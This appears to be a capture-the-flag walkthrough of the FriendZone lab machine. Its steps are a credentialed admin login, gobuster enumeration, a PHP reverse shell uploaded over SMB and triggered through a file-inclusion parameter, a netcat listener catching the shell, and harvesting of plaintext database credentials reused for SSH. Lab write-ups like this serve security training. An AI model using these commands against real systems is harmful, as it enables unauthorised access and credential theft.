6 administrator1.friendzone.red
Successful login using `admin:WORKWORKHhallelujah@#` at https://administrator1.friendzone.red/
Login Done ! visit /dashboard.php
https://administrator1.friendzone.red/dashboard.php
Smart photo script for friendzone corp !
* Note : we are dealing with a beginner php developer and the application is not tested yet !
image_name param is missed !
please enter it to show the image
default is image_id=a.jpg&pagename=timestamp
$ gobuster dir -u https://administrator1.friendzone.red/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -k -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://administrator1.friendzone.red/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2021/06/06 14:57:47 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 349] [--> https://administrator1.friendzone.red/images/]
/login.php (Status: 200) [Size: 7]
/dashboard.php (Status: 200) [Size: 101]
/timestamp.php (Status: 200) [Size: 36]
image_id =
/images/<file_is_here>
pagename =
<.php file>
We can upload a rev-shell using smb
$ smbclient //10.10.10.123/Development
Enter WORKGROUP\kashz's password:
Try "help" to get a list of possible commands.
smb: \> put shell.php
putting file shell.php as \shell.php (6.2 kb/s) (average 6.2 kb/s)
smb: \> ls
. D 0 Sun Jun 6 15:16:26 2021
.. D 0 Wed Jan 23 13:51:02 2019
shell.php A 9141 Sun Jun 6 15:16:28 2021
Going to https://administrator1.friendzone.red/dashboard.php?image_id=b.jpg&pagename=/etc/Development/shell
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.123] 35382
SOCKET: Shell has connected! PID: 2044
whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
grep -rnw /var/www -ie "friend" --color=always 2>/dev/null
<nw /var/www -ie "friend" --color=always 2>/dev/null
/var/www/friendzone/index.html:7:<center><h2>Ready to escape from friend zone !</h2></center>
/var/www/mysql_data.conf:1:for development process this is the mysql creds for user friend
/var/www/mysql_data.conf:3:db_user=friend
/var/www/html/index.html:1:<title>Friend Zone Escape software</title>
cat /var/www/mysql_data.conf
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ
SSH works using friend:Agpyu12!0.213$
Last updated